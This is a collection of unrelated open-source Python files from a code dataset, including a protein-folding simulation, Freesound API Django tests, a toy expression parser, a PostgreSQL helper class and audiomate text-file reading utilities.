that acid, then either moves it or doesn't\n#@jit\ndef sweep(acid_index, neigh_index, prob_index): \n \n #global A \n #global E_chain\n \n # Randomly select one acid in the chain\n acid_pos = acid_picks[acid_index]\n \n print(acid_pos)\n \n acid = A[acid_pos]\n acid_x = acid[1]\n acid_y = acid[2]\n \n print(acid)\n \n #print(\"Selected acid: \" + str(acid))\n \n \n # Determine the acids the currently examined acid is bonded to \n first_partner = tuple(A[acid_pos-1, 1:]) if not acid_pos == 0 else None\n second_partner = tuple(A[acid_pos+1, 1:]) if not acid_pos == len(A)-1 else None\n partners = (first_partner, second_partner)\n \n #print(\"Partners: \" + str(partners))\n \n \n # Randomly select a nearest neighbour to move to\n neigh_type = neigh_picks[neigh_index]\n \n neigh_offset = move_neighs[neigh_type]\n \n neigh_pos = (acid_x+neigh_offset[0], acid_y+neigh_offset[1]) # creating a tuple is faster than assigning a list\n \n #print(\"Proposed new position: \" + str(neigh_pos))\n \n \n # Determine if acid can move to selected position without breaking bonds \n can_move = True\n \n if lattice[neigh_pos[1], neigh_pos[0]] != 0:\n can_move = False\n \n else:\n for partner in partners:\n if partner is None:\n continue\n elif not (abs(partner[0] - neigh_pos[0]) + abs(partner[1] - neigh_pos[1]) == 1):\n can_move = False\n \n #print(can_move)\n \n energy(acid[0], acid[1], acid[2], partners)\n \n if can_move:\n 1\n \n E_i = energy(acid[0], acid_x, acid_y, partners)\n E_f = energy(acid[0], neigh_pos[0], neigh_pos[1], partners)\n delta_E = E_f-E_i\n #print(\"\\nDELTA_E: \" + str(delta_E))\n \n if delta_E < 0 or prob_picks[prob_index] < math.exp(delta_E/T):\n #print(\"Moving from (\" + str(acid_x) + \", \" + str(acid_y) + \") to (\" + str(neigh_pos[0]) + \", \" + \n #str(neigh_pos[1]) + \")\")\n lattice[acid_y, acid_x] = 0\n lattice[neigh_pos[1], neigh_pos[0]] = acid[0]\n A[acid_pos] = [acid[0], neigh_pos[0], neigh_pos[1]]\n \n #blank = E_chain\n \n #E_chain += delta_E\n \n #print(\"changed A at \" + str(acid_pos))\n #print(A)\n\n # Show the protein on the lattice\n #plt.imshow(lattice)\n #plt.show()\n \n #return A\n \n \n \n \n\nfor i in range(10):\n print(A)\n sweep(curr_acid_pick, curr_neigh_pick, curr_prob_pick)\n curr_acid_pick += 1\n curr_neigh_pick += 1\n curr_prob_pick += 1\n \n# Show the protein on the lattice\n#plt.imshow(lattice)\n#plt.show()","repo_name":"JohnPHealey/protein-folding","sub_path":"protein_folding.py","file_name":"protein_folding.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8966107710","text":"# Task :\n#\n# Find the occurence of each element in the list\n\nif __name__ == '__main__':\n\n my_list = []\n count = 1\n n = int(input('Enter List Size : '))\n\n for i in range(n):\n num = int(input('Enter Number : '))\n my_list.append(num)\n\n my_list.sort()\n\n for i in range(n-1):\n if(my_list[i] == my_list[i+1]):\n count += 1\n else:\n print(my_list[i],'occurs', count,'times')\n count=1\n","repo_name":"NeeleshVashist/Python-Practice","sub_path":"Class Questions/Occurance Finder.py","file_name":"Occurance Finder.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17218597244","text":"#\n# Freesound is (c) MUSIC TECHNOLOGY GROUP, UNIVERSITAT POMPEU FABRA\n#\n# Freesound is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# Freesound is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n# Authors:\n# See AUTHORS file.\n#\nfrom django.test import TestCase, SimpleTestCase, RequestFactory\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.sites.models import Site\n\nfrom apiv2.models import ApiV2Client\nfrom apiv2.apiv2_utils import ApiSearchPaginator\nfrom apiv2.serializers import SoundListSerializer, DEFAULT_FIELDS_IN_SOUND_LIST, SoundSerializer\nfrom forms import SoundCombinedSearchFormAPI\nfrom sounds.models import Sound\nfrom utils.test_helpers import create_user_and_sounds\n\nfrom exceptions import BadRequestException\n\n\nclass TestAPiViews(TestCase):\n fixtures = ['licenses']\n\n def test_pack_views_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n for sound in sounds:\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n # Login so api returns session login based responses\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on pack instance\n resp = self.client.get(reverse('apiv2-pack-instance', kwargs={'pk': packs[0].id}))\n self.assertEqual(resp.status_code, 200)\n\n # 200 response on pack instance sounds list\n resp = self.client.get(reverse('apiv2-pack-sound-list', kwargs={'pk': packs[0].id}))\n self.assertEqual(resp.status_code, 200)\n\n # 200 response on pack instance download\n # This test uses a https connection.\n resp = self.client.get(reverse('apiv2-pack-download',\n kwargs={'pk': packs[0].id}), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_oauth2_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n client = ApiV2Client.objects.create(user=user, description='',\n name='', url='', redirect_uri='https://freesound.org')\n # Login so api returns session login based responses\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on Oauth2 authorize\n resp = self.client.post(reverse('oauth2_provider:authorize'),\n {'client_id': client.id, 'response_type': 'code'}, secure=True)\n self.assertEqual(resp.status_code, 200)\n\n # 302 response on Oauth2 logout and authorize\n resp = self.client.post(reverse('oauth2_provider:logout_and_authorize'),\n {'client_id': client.id}, secure=True)\n self.assertEqual(resp.status_code, 302)\n\n def test_basic_user_response_ok(self):\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n # 200 response on login page\n resp = self.client.get(reverse('api-login'), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n self.client.login(username=user.username, password='testpass')\n\n # 200 response on keys page\n resp = self.client.get(reverse('apiv2-apply'), secure=True)\n self.assertEqual(resp.status_code, 200)\n\n # 302 response on logout page\n resp = self.client.get(reverse('api-logout'), secure=True)\n self.assertEqual(resp.status_code, 302)\n\n\nclass TestAPI(TestCase):\n fixtures = ['licenses']\n\n def test_cors_header(self):\n # Create App to login using token\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n c = ApiV2Client(user=user, status='OK', redirect_uri=\"https://freesound.com\",\n url=\"https://freesound.com\", name=\"test\")\n c.save()\n\n sound = sounds[0]\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token %s' % c.key,\n 'HTTP_ORIGIN': 'https://www.google.com'\n }\n resp = self.client.options(reverse('apiv2-sound-instance',\n kwargs={'pk': sound.id}), secure=True, **headers)\n self.assertEqual(resp.status_code, 200)\n # Check if header is present\n self.assertEqual(resp['ACCESS-CONTROL-ALLOW-ORIGIN'], '*')\n\n def test_encoding(self):\n # Create App to login using token\n user, packs, sounds = create_user_and_sounds(num_sounds=5, num_packs=1)\n\n c = ApiV2Client(user=user, status='OK', redirect_uri=\"https://freesound.com\",\n url=\"https://freesound.com\", name=\"test\")\n c.save()\n\n sound = sounds[0]\n sound.change_processing_state(\"OK\")\n sound.change_moderation_state(\"OK\")\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token %s' % c.key,\n }\n # make query that can't be decoded\n resp = self.client.options(\"/apiv2/search/text/?query=ambient&filter=tag:(rain%20OR%CAfe)\", secure=True, **headers)\n self.assertEqual(resp.status_code, 200)\n\n\nclass ApiSearchPaginatorTest(TestCase):\n def test_page(self):\n paginator = ApiSearchPaginator([1, 2, 3, 4, 5], 5, 2)\n page = paginator.page(2)\n\n self.assertEqual(page, {'object_list': [1, 2, 3, 4, 5],\n 'has_next': True,\n 'has_previous': True,\n 'has_other_pages': True,\n 'next_page_number': 3,\n 'previous_page_number': 1,\n 'page_num': 2})\n\n\nclass TestSoundCombinedSearchFormAPI(SimpleTestCase):\n # Query\n def test_query_empty_valid(self):\n for query in [' ', '', '\" \"', '\"\"', \"' '\", \"''\"]:\n form = SoundCombinedSearchFormAPI(data={'query': query})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['query'], '')\n\n # Filter\n def test_filter_empty_invalid(self):\n for filt in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'filter': filt})\n with self.assertRaisesMessage(BadRequestException, 'Invalid filter.'):\n self.assertFalse(form.is_valid())\n\n def test_filter_valid(self):\n filt = 'text'\n form = SoundCombinedSearchFormAPI(data={'filter': 'text'})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['filter'], filt)\n\n # Descriptors\n def test_descriptors_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors'], '')\n\n def test_descriptors_valid(self):\n descriptors = 'test'\n form = SoundCombinedSearchFormAPI(data={'descriptors': descriptors})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors'], descriptors)\n\n # Normalized\n def test_normalized_valid(self):\n normalized = '1'\n form = SoundCombinedSearchFormAPI(data={'normalized': normalized})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['normalized'], normalized)\n\n def test_normalized_bogus_valid(self):\n for normalized in ['0', '', 'test']:\n form = SoundCombinedSearchFormAPI(data={'normalized': normalized})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['normalized'], '')\n\n # Page\n def test_page_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['page'], 1)\n\n def test_page_bogus_valid(self):\n for page in ['', 'test']:\n form = SoundCombinedSearchFormAPI(data={'page': page})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['page'], 1)\n\n # Sort\n def test_sort_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n sort = form.cleaned_data['sort']\n self.assertEqual(len(sort), 1)\n self.assertEqual(sort[0], 'score desc')\n\n def test_sort_multiple_valid(self):\n form = SoundCombinedSearchFormAPI(data={'sort': 'rating_desc'})\n self.assertTrue(form.is_valid())\n sort = form.cleaned_data['sort']\n self.assertEqual(sort[0], \"avg_rating desc\")\n self.assertEqual(len(sort), 2)\n self.assertEqual(sort[1], \"num_ratings desc\")\n\n # Normalized\n def test_group_by_pack_valid(self):\n group_by_pack = '1'\n form = SoundCombinedSearchFormAPI(data={'group_by_pack': group_by_pack})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['group_by_pack'], group_by_pack)\n\n def test_group_by_pack_bogus_valid(self):\n for group_by_pack in ['0', '', 'test']:\n form = SoundCombinedSearchFormAPI(data={'group_by_pack': group_by_pack})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['group_by_pack'], '')\n\n # Page size\n def test_page_size_empty_valid(self):\n form = SoundCombinedSearchFormAPI(data={})\n self.assertTrue(form.is_valid())\n self.assertTrue(form.cleaned_data[settings.APIV2['PAGE_SIZE_QUERY_PARAM']], settings.APIV2['PAGE_SIZE'])\n\n def test_page_size_max_valid(self):\n param = settings.APIV2['PAGE_SIZE_QUERY_PARAM']\n form = SoundCombinedSearchFormAPI(data={param: settings.APIV2['MAX_PAGE_SIZE'] + 1})\n self.assertTrue(form.is_valid())\n self.assertTrue(form.cleaned_data[param], settings.APIV2['MAX_PAGE_SIZE'])\n\n # Descriptors filter\n def test_descriptors_filter_empty_invalid(self):\n for descriptors_filter in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'descriptors_filter': descriptors_filter})\n with self.assertRaisesMessage(BadRequestException, 'Invalid descriptors_filter.'):\n self.assertFalse(form.is_valid())\n\n def test_descriptors_filter_valid(self):\n descriptors_filter = 'test'\n form = SoundCombinedSearchFormAPI(data={'descriptors_filter': descriptors_filter})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['descriptors_filter'], descriptors_filter)\n\n # Target\n def test_target_empty_invalid(self):\n for target in ['', ' ']:\n form = SoundCombinedSearchFormAPI(data={'target': target})\n with self.assertRaisesMessage(BadRequestException, 'Invalid target.'):\n self.assertFalse(form.is_valid())\n\n def test_target_valid(self):\n target = 'test'\n form = SoundCombinedSearchFormAPI(data={'target': target})\n self.assertTrue(form.is_valid())\n self.assertEqual(form.cleaned_data['target'], target)\n\n\nclass TestSoundListSerializer(TestCase):\n\n fixtures = ['licenses', 'sounds']\n\n def setUp(self):\n self.ss = Sound.objects.all()[0:5]\n self.sids = [s.id for s in self.ss]\n self.factory = RequestFactory()\n\n def test_num_fields(self):\n # Test that serializer returns only fields included in fields parameter of the request\n\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids)\n\n # When 'fields' parameter is not used, return default ones\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': ''})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), DEFAULT_FIELDS_IN_SOUND_LIST.split(','))\n\n # When only some parameters are specified\n fields_parameter = 'id,username'\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': fields_parameter})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), fields_parameter.split(','))\n\n # When all parameters are specified\n fields_parameter = ','.join(SoundListSerializer.Meta.fields)\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': fields_parameter})\n serialized_sound = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), fields_parameter.split(','))\n\n def test_num_queries(self):\n # Test that the serializer does not perform any extra query when serializing sounds regardless of the number\n # of sounds and the number of requested fields. This will be as long as sound object passed to the serializer\n # has been obtained using Sound.objects.dict_ids or Sound.objects.bulk_query_id\n\n # Make sure sound content type and site objects are cached to avoid further queries\n ContentType.objects.get_for_model(Sound)\n Site.objects.get_current()\n\n field_sets = [\n '', # default fields\n ','.join(SoundListSerializer.Meta.fields), # all fields\n ]\n\n # Test when serializing a single sound\n for field_set in field_sets:\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids[0])\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': field_set})\n # Call serializer .data to actually get the data and potentially trigger unwanted extra queries\n _ = SoundListSerializer(list(sounds_dict.values())[0], context={'request': dummy_request}).data\n\n # Test when serializing mulitple sounds\n for field_set in field_sets:\n sounds_dict = Sound.objects.dict_ids(sound_ids=self.sids)\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-text-search'), {'fields': field_set})\n for sound in sounds_dict.values():\n # Call serializer .data to actually get the data and potentially trigger unwanted extra queries\n _ = SoundListSerializer(sound, context={'request': dummy_request}).data\n\n\nclass TestSoundSerializer(TestCase):\n\n fixtures = ['licenses', 'sounds']\n\n def setUp(self):\n self.sound = Sound.objects.bulk_query_id(Sound.objects.first().id)[0]\n self.factory = RequestFactory()\n\n def test_num_fields_and_num_queries(self):\n\n # Make sure sound content type and site objects are cached to avoid further queries\n ContentType.objects.get_for_model(Sound)\n Site.objects.get_current()\n\n # Test that the serialized sound instance includes all fields in the serializer and does not perform any\n # extra query. Because in this test we get sound info using Sound.objects.bulk_query_id, the serializer\n # should perform no extra queries to render the data\n with self.assertNumQueries(0):\n dummy_request = self.factory.get(reverse('apiv2-sound-instance', args=[self.sound.id]))\n serialized_sound = SoundSerializer(self.sound, context={'request': dummy_request}).data\n self.assertItemsEqual(serialized_sound.keys(), SoundSerializer.Meta.fields)\n","repo_name":"CLOUDROG/freesound","sub_path":"apiv2/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":15980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"30056103009","text":"#!/usr/bin/python\nimport math\n\nans = []\nfor i in range(1000,10000):\n num = str(i)\n #check to ensure the number format aabb is met\n if num[0] == num[1] and num[2] == num[3]:\n print('testing',i)\n #check to see make sure the number is a perfect square.\n #the normal root will be equal to the root rounded to any number in this case 5\n if math.sqrt(i)==round(math.sqrt(i),5):\n ans.append(i)\nprint('The number aabb which is a perfect square is' ,ans)\n \n","repo_name":"yoda-of-codas/Number_Theory","sub_path":"number theory 6.py","file_name":"number theory 6.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33136123421","text":"import enum\nfrom os import uname\nfrom typing import Any, List\nfrom lexer import BASE_TOKEN_IDS, Lexer, Token\n\n\nclass Node:\n value: Any\n\n def __init__(self, value, name):\n self.value = value\n self.name = name\n\n def __str__(self) -> str:\n return f\"({self.name}: {self.value})\"\n\n\nclass UnaryNode(Node):\n ...\n\n\nclass BinaryNode(Node):\n def __init__(self, left, right, value):\n self.value = value\n self.left = left\n self.right = right\n\n def __str__(self) -> str:\n return f\"({self.left.value}{self.value}{self.right.value})\"\n\n\nclass Parser:\n tokens: List[Token]\n\n def __init__(self, source):\n self.source = source\n self.pos = 0\n self.lexer = Lexer(source)\n self.tokens = self.lexer.lex()\n self.running = False\n\n def parse(self) -> List[Node]:\n for i, token in enumerate(self.tokens):\n if token.value in BASE_TOKEN_IDS.keys():\n self.tokens[i] = Token(\n BASE_TOKEN_IDS[token.value], token.value\n )\n\n self.running = True\n while self.running:\n yield (self.parse_expr())\n\n @property\n def curr_token(self) -> Token:\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n self.running = False\n return Token(\"END\", \"END\")\n\n @property\n def prev_token(self) -> Token:\n if self.pos >= 0:\n return self.tokens[self.pos - 1]\n self.running = False\n return Token(\"END\", \"END\")\n\n @property\n def next_token(self) -> Token:\n if self.pos < len(self.tokens) - 1:\n return self.tokens[self.pos + 1]\n self.running = False\n return Token(\"END\", \"END\")\n\n def parse_func_args(self):\n args = []\n while self.curr_token.id != \"CLOS_PAREN\":\n args.append(self.parse_expr())\n if self.curr_token.id == \"SYMB_COMMA\":\n self.pos += 1\n continue\n else:\n break\n return UnaryNode(args, \"PARAM_LIST\")\n\n def parse_expr(self):\n if self.curr_token.id == \"ITEM\":\n if self.next_token.id == \"OPEN_PAREN\":\n n = BinaryNode(\n UnaryNode(self.curr_token.value, \"ITEM\"),\n Node(\"\", \"\"),\n \"FUNC\",\n )\n self.pos += 2\n n.right = self.parse_func_args()\n if self.curr_token.id == \"CLOS_PAREN\":\n self.pos += 1\n return n\n else:\n if self.curr_token.id == \"END\":\n return n\n else:\n raise Exception(\n f\"Expected ')', found {self.curr_token.value} instead\"\n )\n elif self.next_token.id.startswith(\"OPER_\"):\n n = BinaryNode(\n UnaryNode(self.curr_token.value, \"ITEM\"),\n Node(\"\", \"\"),\n self.next_token.id,\n )\n self.pos += 2\n n.right = self.parse_expr()\n return n\n else:\n self.pos += 1\n return UnaryNode(self.prev_token.value, \"ITEM\")\n\n elif self.curr_token.id == \"OPEN_PAREN\":\n self.pos += 1\n expr = self.parse_expr()\n self.pos += 1\n return expr\n\n elif (\n self.curr_token.id == \"NUMBER_LIT\"\n or self.curr_token.id == \"STRING_LIT\"\n ):\n if self.next_token.id.startswith(\"OPER_\"):\n n = BinaryNode(\n UnaryNode(self.curr_token.value, self.curr_token.id),\n UnaryNode(\"\", \"\"),\n self.next_token.id,\n )\n self.pos += 2\n n.right = self.parse_expr()\n return n\n else:\n self.pos += 1\n return UnaryNode(self.prev_token.value, self.prev_token.id)\n\n self.running = False\n","repo_name":"georgemunyoro/boomlang","sub_path":"boom_parser.py","file_name":"boom_parser.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38044351220","text":"#!/usr/bin/env python3\n\n# Imports\nimport sys\nimport random\n\n# Constants\nN = 10\nM = 100\n\n# Command arguments\nseed, send_fd, recv_fd = map(int, sys.argv[1:])\n\n# Seed the RNG\nrandom.seed(seed)\n\n# Open send pipe\nwith open(send_fd, 'w', buffering=1) as send:\n\n # Print number of test cases\n print(N, file=send)\n\n # Open recv pipe\n with open(recv_fd, 'r', buffering=1) as recv:\n\n # Loop over attempts\n for _ in range(N):\n\n # Send input\n a = random.randint(0, M)\n b = random.randint(0, M)\n print(a, b, file=send)\n\n # Check output\n line = recv.readline()\n try:\n assert a + b == int(line)\n except AssertionError:\n print('FAILED')\n except Exception:\n print('ERROR')\n else:\n print('PASSED')\n","repo_name":"vxgmichel/jammin","sub_path":"example/interactive-sum/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30496157425","text":"import os\nimport click\nimport psycopg2\nfrom psycopg2 import sql\nfrom pprint import pprint\nfrom dotenv import load_dotenv\nfrom get_creds import creds\n\n\nclass PGConn:\n def __init__(self):\n self.config = creds()\n self.conn = psycopg2.connect(\n dbname = self.config.get(\"PGDATABASE\"),\n user = self.config.get(\"PGUSER\"),\n password = self.config.get(\"PGPASSWORD\"),\n port = self.config.get(\"PGPORT\"),\n host = self.config.get(\"PGHOST\")\n )\n self.cur = self.conn.cursor()\n\n\n def get_table_rows(self, table):\n try:\n self.cur.execute(\n sql.SQL(\"SELECT * FROM {};\").format(sql.Identifier(table)))\n rows = self.cur.fetchall()\n return rows\n except psycopg2.errors.UndefinedTable:\n click.secho(\"The table {} does not exist\".format(table), fg=\"red\")\n\n\n def insert_customer(self, first_name, last_name, age, gender, email):\n \"\"\"\n Insert a customer with INSERT INTO statement\n \"\"\"\n self.cur.execute(\"\"\"\n INSERT INTO customer (first_name, last_name, age, gender, email) VALUES (%s, %s, %s, %s, %s)\n \"\"\", (first_name, last_name, age, gender, email))\n self.conn.commit()\n\n\n def insert_customer_sp(self, values):\n \"\"\"\n Insert a customer to the table using\n a stored procedure\n \"\"\"\n self.cur.execute(\"CALL create_customer(%s, %s, %s, %s, %s);\", (tuple(values)))\n self.conn.commit()\n\n\n def insert_row(self, table, data):\n try:\n print(data)\n print(type(data))\n sql_query = sql.SQL(\"INSERT INTO {} VALUES ({})\".format(sql.Identifier(table), (\"%s,\"*len(data)).rstrip(\",\")), [\"test\", \"test\"])\n print(sql_query)\n self.cur.execute(sql_query)\n self.conn.commit()\n except:\n click.secho(\"Invalid table/data\", fg=\"red\")\n\n \n def exec_query(self, query):\n \"\"\"\n Execute the given query\n \"\"\"\n try:\n self.cur.execute(query)\n try:\n rows = self.cur.fetchall()\n pprint(rows)\n except:\n pass\n except:\n click.secho(\"Invalid query!\", fg=\"red\")\n\n\n def kill(self):\n self.cur.close()\n self.conn.close()\n","repo_name":"daniel-sjkdm/StoreDatabase","sub_path":"python/PGConn.py","file_name":"PGConn.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503988641","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport itertools\nimport math\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\n\n\n# dp[x] := x を作るのに必要な正四面体数の個数の最小値\n# dp[x] = min(dp[x], dp[x - g(i)] + 1)\n# ここで、i は x <= g(i) を満たす\n\n\ndef g(n):\n return n * (n + 1) * (n + 2) // 6\n\n\ndef fill_dp(dp, odddp):\n i = 1\n while True:\n g_i = g(i)\n if g_i >= max_num:\n break\n for x in range(g_i, max_num):\n dp[x] = min(dp[x], dp[x - g_i] + 1)\n if g_i % 2 == 1:\n odddp[x] = min(odddp[x], odddp[x - g_i] + 1)\n i += 1\n return dp, odddp\n\n\nmax_num = 10 ** 6\ndp = [max_num] * (max_num + 1)\nodddp = [max_num] * (max_num + 1)\n\ndp[0] = 0\nodddp[0] = 0\ndp, odddp = fill_dp(dp, odddp)\n\nwhile True:\n num = int(input())\n if num == 0:\n break\n print(dp[num], odddp[num])\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/review/dinamic-programming/44-pollock.py","file_name":"44-pollock.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"968199645","text":"from rest_flex_fields import FlexFieldsModelSerializer\nfrom rest_framework import serializers\n\nfrom staff_models.staffs.class_models.staff import Staff\nfrom staff_models.staffs.class_serializers.staff_address_serializers import StaffAddressSerializer\nfrom staff_models.staffs.class_serializers.staff_phone_serializers import StaffPhoneSerializer\n\n\nclass StaffSerializer(FlexFieldsModelSerializer):\n staff_phone = serializers.PrimaryKeyRelatedField(read_only=True, many=True)\n staff_address = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = Staff\n fields = [\n 'id',\n 'url',\n 'name',\n 'is_active',\n 'staff_phone',\n 'staff_address'\n ]\n expandable_fields = {\n 'staff_phone': (StaffPhoneSerializer, {'many': True}),\n 'staff_address': StaffAddressSerializer\n }\n","repo_name":"reimibeta/django-staff-models","sub_path":"staff_models/staffs/class_serializers/staff_serializers.py","file_name":"staff_serializers.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71648077281","text":"\"\"\"\nThe textfile module contains functions\nfor reading and writing textfiles.\n\"\"\"\n\nimport os\n\nfrom audiomate.utils import text\nfrom audiomate import logutil\n\nlogger = logutil.getLogger()\n\n\ndef read_separated_lines(path, separator=' ', max_columns=-1, keep_empty=False):\n \"\"\"\n Reads a text file where each line represents a record with some separated columns.\n\n Parameters:\n path (str): Path to the file to read.\n separator (str): Separator that is used to split the columns.\n max_columns (int): Number of max columns (if the separator occurs within the last column).\n keep_empty (bool): If True empty columns are returned as well.\n\n Returns:\n list: A list containing a list for each line read.\n \"\"\"\n\n gen = read_separated_lines_generator(path, separator, max_columns, keep_empty=keep_empty)\n return list(gen)\n\n\ndef read_separated_lines_with_first_key(path: str, separator: str = ' ', max_columns: int = -1,\n keep_empty: bool = False):\n \"\"\"\n Reads the separated lines of a file and return a dictionary with the first column as keys, value\n is a list with the rest of the columns.\n\n Parameters:\n path (str): Path to the file to read.\n separator (str): Separator that is used to split the columns.\n max_columns (str): Number of max columns (if the separator occurs within the last column).\n keep_empty (bool): If True empty columns are returned as well.\n\n Returns:\n dict: Dictionary with list of column values and first column value as key.\n \"\"\"\n gen = read_separated_lines_generator(path, separator, max_columns, keep_empty=keep_empty)\n\n dic = {}\n\n for record in gen:\n if len(record) > 0:\n dic[record[0]] = record[1:len(record)]\n\n return dic\n\n\ndef read_key_value_lines(path, separator=' ', default_value=''):\n \"\"\"\n Reads lines of a text file with two columns as key/value dictionary.\n\n Parameters:\n path (str): Path to the file.\n separator (str): Separator that is used to split key and value.\n default_value (str): If no value is given this value is used.\n\n Returns:\n dict: A dictionary with first column as key and second as value.\n \"\"\"\n gen = read_separated_lines_generator(path, separator, 2)\n\n dic = {}\n\n for record in gen:\n if len(record) > 1:\n dic[record[0]] = record[1]\n elif len(record) > 0:\n dic[record[0]] = default_value\n\n return dic\n\n\ndef write_separated_lines(path, values, separator=' ', sort_by_column=0):\n \"\"\"\n Writes list or dict to file line by line. Dict can have list as value then they written\n separated on the line.\n\n Parameters:\n path (str): Path to write file to.\n values (dict, list): A dictionary or a list to write to the file.\n separator (str): Separator to use between columns.\n sort_by_column (int): if >= 0, sorts the list by the given index, if its 0 or 1 and its a\n dictionary it sorts it by either the key (0) or value (1). By default\n 0, meaning sorted by the first column or the key.\n \"\"\"\n with open(path, 'w', encoding='utf-8') as f:\n\n if type(values) is dict:\n if sort_by_column in [0, 1]:\n items = sorted(values.items(), key=lambda t: t[sort_by_column])\n else:\n items = values.items()\n\n for key, value in items:\n if type(value) in [list, set]:\n value = separator.join([str(x) for x in value])\n\n f.write('{}{}{}\\n'.format(key, separator, value))\n elif type(values) is list or type(values) is set:\n if 0 <= sort_by_column < len(values):\n items = sorted(values)\n else:\n items = values\n\n for record in items:\n str_values = [str(value) for value in record]\n\n f.write('{}\\n'.format(separator.join(str_values)))\n\n\ndef read_separated_lines_generator(path, separator=' ', max_columns=-1,\n ignore_lines_starting_with=None, keep_empty=False):\n \"\"\"\n Creates a generator through all lines of a file and returns the splitted line.\n\n Parameters:\n path (str): Path to the file.\n separator (str): Separator that is used to split the columns.\n max_columns (int): Number of max columns (if the separator occurs within the last column).\n ignore_lines_starting_with (list): Lines starting with a string in this list will be ignored.\n keep_empty (bool): If True empty columns are returned as well.\n \"\"\"\n if not os.path.isfile(path):\n logger.error('File doesnt exist or is no file: %s', path)\n return\n\n with open(path, 'r', errors='ignore', encoding='utf-8') as f:\n\n if max_columns > -1:\n max_splits = max_columns - 1\n else:\n max_splits = -1\n\n for line in f:\n if keep_empty:\n stripped_line = line\n else:\n stripped_line = line.strip()\n\n if ignore_lines_starting_with is not None:\n should_ignore = text.starts_with_prefix_in_list(\n stripped_line,\n ignore_lines_starting_with\n )\n else:\n should_ignore = False\n\n if not should_ignore and stripped_line != '':\n record = stripped_line.split(sep=separator, maxsplit=max_splits)\n record = [field.strip() for field in record]\n yield 